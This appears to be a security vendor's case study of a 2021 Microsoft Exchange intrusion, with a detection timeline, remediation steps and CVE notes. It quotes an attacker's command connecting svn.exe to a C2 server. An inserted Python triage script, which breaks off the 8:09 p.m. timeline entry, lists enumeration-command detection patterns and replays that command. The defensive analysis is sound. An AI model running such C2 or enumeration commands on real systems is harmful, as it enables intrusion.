Microsoft Exchange Vulnerability
Time from detection to escalation: 20 minutes
In this real-world attack example, an Arctic Wolf customer in the construction industry experienced a vulnerability-based incident. The threat actor leveraged multiple Microsoft Exchange vulnerabilities for access, but Arctic Wolf helped this customer swiftly stop the incident and create a long-term fix for these vulnerabilities.
On Tuesday, March 2, 2021, one week ahead of its typical Patch Tuesday release, Microsoft released an out-of-band patch to address multiple critical vulnerabilities in Microsoft Exchange, the company’s email and calendar server.
What do these vulnerabilities mean?
These vulnerabilities allowed attackers to take full control of a Microsoft Exchange Server exposed to the public internet. Microsoft reported that the vulnerabilities were being actively exploited by HAFNIUM, a threat group Microsoft describes as state-sponsored and operating out of China, with attacks dating back to at least January 6, 2021.
Attacker's 5-month window

March 2021
Microsoft releases an out-of-band patch to address multiple critical vulnerabilities within Microsoft Exchange.

April 2021
Microsoft releases security updates for a second set of RCE vulnerabilities within Microsoft Exchange.

May - July 2021
This collection of vulnerabilities is dubbed ProxyShell; bad actors chain three separate vulnerabilities in a single attack to bypass authentication and execute code.

August 2, 2021
Customer completes onboarding with Arctic Wolf.
5:00 p.m. | Monday, August 2 | Source: customer onboarding
[CUSTOMER] completes onboarding with Arctic Wolf five days before the incident, with service delivery kicking off on Monday, August 2, 2021.

7:27 p.m. | Saturday, August 7 | Source: Arctic Wolf Agent
The Arctic Wolf Agent observes PowerShell enumeration commands on [Exchange Server]; investigation into [User1] activity begins.

7:29 - 7:47 p.m. | Saturday, August 7 | Arctic Wolf Triage Team: investigation begins
The Arctic Wolf Triage Team begins its investigation and confirms that the enumeration commands are suspicious (possible Ryuk). The Triage Team creates a ticket and contacts [customer].

7:50 p.m. | Saturday, August 7
Monitoring continues on the Arctic Wolf Aurora™ Platform.

8:08 p.m. | Saturday, August 7 | Source: Arctic Wolf Agent
SVN.exe is dropped to [customer]; the agent records the PowerShell command “svn.exe --connect 135.181.x.x:443 --Pass Pasword123”.
Log source: Arctic Wolf Sensor. IP 135.181.x.x is associated with a C2 server in Finland.

8:09 p.m. | Saturday, August 7 | Source: SentinelOne / Arctic Wolf Agent
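As an added example (not Arctic Wolf's own detection logic), the Python triage below runs over constructed process-creation events that mirror the two observations in the timeline: PowerShell enumeration by [User1] and svn.exe connecting out to an external address on port 443 with a password on its command line. The event fields, the list of enumeration commands, the internal address ranges and the 203.0.113.10 address standing in for the masked 135.181.x.x are all assumptions.

```python
import ipaddress
import re

# Constructed sample process-creation events (not real telemetry). The svn.exe
# line mirrors the command quoted in the timeline; 203.0.113.10 is a
# documentation address standing in for the masked 135.181.x.x.
SAMPLE_EVENTS = [
    {"user": "User1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -c "Get-ADUser -Filter *; net group Administrators /domain"'},
    {"user": "User1", "image": r"C:\Users\Public\svn.exe",
     "cmdline": "svn.exe --connect 203.0.113.10:443 --Pass Pasword123"},
    {"user": "svc_backup", "image": r"C:\Program Files\BackupAgent\agent.exe",
     "cmdline": "agent.exe --connect 10.0.0.5:8443"},
]

# Assumed: common AD/host enumeration commands a triage team would treat as suspicious.
ENUM_PATTERN = re.compile(
    r"\b(Get-AD(User|Computer|Group|GroupMember)|net\s+(user|group|localgroup)"
    r"|whoami\s+/all|nltest|Get-LocalGroupMember)\b", re.IGNORECASE)
CONNECT_PATTERN = re.compile(r"--?connect\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)", re.IGNORECASE)
PASSWORD_FLAG = re.compile(r"--?pass(word)?\b", re.IGNORECASE)
# Assumed customer-internal ranges; anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip: str) -> bool:
    """True when the address falls outside the assumed internal ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def triage(event: dict) -> list[str]:
    """Findings for one process-creation event; an empty list means nothing to flag."""
    findings = []
    cmd = event["cmdline"]
    if event["image"].lower().endswith("powershell.exe") and ENUM_PATTERN.search(cmd):
        findings.append("powershell enumeration")
    m = CONNECT_PATTERN.search(cmd)
    if m and is_external(m.group(1)):
        note = f"outbound connect to external {m.group(1)}:{m.group(2)}"
        if PASSWORD_FLAG.search(cmd):
            note += " with password on command line"
        findings.append(note)
    return findings
```

Running `triage` over each event flags only the two [User1] events; the internal backup agent connection is left alone.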
9:00 a.m. | Monday, August 9 | Remediation
Arctic Wolf sets up a virtual call with [CUSTOMER] to step through the remediation process:
Delete SVN.exe
Delete the [User1] account and reset the [Admin] account
Reset credentials for any cached users on [Exchange Server]
Reset any domain credentials that accessed the server after Saturday, August 7
Implement firewall blocking rules
Security journey with our Concierge Security® Team
Although many managed detection and response services would end once the threat was remediated, the Concierge Security® Team is focused on using this attack to improve the security posture of the customer.
The Arctic Wolf Concierge Security Team provides your team with coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.
Arctic Wolf CST initiates a vulnerability scan covering the [User1] account and the reset [Exchange Server]. The scan identifies missing critical patches dating back six or more months, including patches for zero-days.
[Customer] confirms their third-party patching tool is malfunctioning.
Arctic Wolf CST delivers a script to identify Exchange breaches that occurred prior to Arctic Wolf onboarding; the script identifies Backdoor:ASP/Buonpower.A!dha.
The pre-existing webshell is removed.
Multi-factor authentication (MFA) for VPN and Office 365 is enabled.
A GPO to prevent enumeration is created.
Arctic Wolf prioritizes keeping our customers and the general public informed of new vulnerabilities and security risks.
Real-World Examples
Microsoft Exchange Vulnerabilities and Patch Guidance
In the example above, an attacker leveraged the Microsoft Exchange vulnerabilities disclosed in early 2021 against a customer in the construction industry.
Microsoft has published detailed guidance and links to the available patches.
CVE-2021-26857
CVE-2021-26858 and CVE-2021-27065
These two are post-authentication arbitrary file write vulnerabilities in Exchange.
If an attacker can authenticate to the Exchange Server, they can use either of these vulnerabilities to write a file to any path on the server. Microsoft also observed HAFNIUM chaining CVE-2021-26855 with these vulnerabilities to authenticate with elevated privileges.
